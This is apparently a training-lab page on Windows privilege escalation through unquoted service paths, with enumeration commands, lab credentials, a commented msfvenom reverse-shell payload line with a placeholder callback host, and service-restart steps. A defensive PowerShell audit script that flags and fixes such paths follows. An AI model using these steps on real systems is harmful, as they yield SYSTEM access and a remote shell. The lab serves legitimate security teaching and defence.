🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as a low-privilege user and escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Unquoted Service Paths

PRIVILEGE ESCALATION
# Windows resolves unquoted paths with spaces left-to-right
# Service path: C:\Program Files\Vulnerable App\service.exe
# Windows tries these in order:
#   C:\Program.exe                    ← tries this first!
#   C:\Program Files\Vulnerable.exe   ← then this
#   C:\Program Files\Vulnerable App\service.exe

# Step 1: Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Or use PowerShell:
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notmatch '"' -and $_.PathName -match ' '} | Select Name,PathName

# Example vulnerable output:
# VulnService  C:\Program Files\Vuln App\service.exe  Auto

# Step 2: Check write permissions on parent directories
icacls "C:\Program Files\Vuln App"
# If BUILTIN\Users has (W) or (F) — you can write there

# Step 3: Drop malicious executable at the hijack point
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o "C:\Program Files\Vuln.exe"

# Step 4: Restart service (if you have permission) or wait for reboot
sc stop VulnService
sc start VulnService
# Your payload runs as SYSTEM

# Automated check with PowerUp.ps1:
. .\PowerUp.ps1
Invoke-AllChecks
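
The resolution order described above can be turned into a defensive audit. The following is an added example, not part of the original lab material: the function name `Test-UnquotedServicePath` is hypothetical and the service rows are constructed sample data shaped like `Win32_Service` output. For each unquoted auto-start path it lists the candidate paths Windows would try, flags any that already exist on disk, and prints the quoted `ImagePath` value that removes the ambiguity.

```powershell
# Added example (defensive audit); not part of the original lab material.
function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$Name,
          [Parameter(Mandatory)][string]$PathName)

    $p = $PathName.Trim()
    # A quoted ImagePath is parsed unambiguously, so there is nothing to report.
    if ($p.StartsWith('"')) { return }

    # Executable portion = up to the first ".exe" followed by a space or end of
    # string; whatever follows is treated as arguments.
    $m = [regex]::Match($p, '^(.+?\.exe)(?=\s|$)(.*)$', 'IgnoreCase')
    if (-not $m.Success) { return }
    $exe  = $m.Groups[1].Value
    $rest = $m.Groups[2].Value
    if (-not $exe.Contains(' ')) { return }

    # Every space is a point where Windows stops and tries "<prefix>.exe".
    $candidates = for ($i = 0; $i -lt $exe.Length; $i++) {
        if ($exe[$i] -eq ' ') { $exe.Substring(0, $i) + '.exe' }
    }

    [pscustomobject]@{
        Service         = $Name
        Candidates      = @($candidates)
        # A file already present at a candidate path deserves investigation.
        PresentOnDisk   = @($candidates | Where-Object { Test-Path -LiteralPath $_ })
        # Value to set in HKLM\SYSTEM\CurrentControlSet\Services\<Name>\ImagePath
        QuotedImagePath = '"' + $exe + '"' + $rest
    }
}

# Constructed sample rows. On a real host, replace with:
#   $services = Get-CimInstance Win32_Service | Select-Object Name, PathName, StartMode
$services = @(
    [pscustomobject]@{ Name = 'VulnService'; StartMode = 'Auto'
                       PathName = 'C:\Program Files\Vuln App\service.exe' }
    [pscustomobject]@{ Name = 'QuotedSvc'; StartMode = 'Auto'
                       PathName = '"C:\Program Files\Good App\svc.exe" -run' }
    [pscustomobject]@{ Name = 'NoSpaceSvc'; StartMode = 'Auto'
                       PathName = 'C:\Windows\system32\svchost.exe -k netsvcs' }
)

$services | Where-Object StartMode -eq 'Auto' |
    ForEach-Object { Test-UnquotedServicePath -Name $_.Name -PathName $_.PathName } |
    Format-List
```

Only `VulnService` is reported from the sample rows; the quoted path and the path without spaces are skipped.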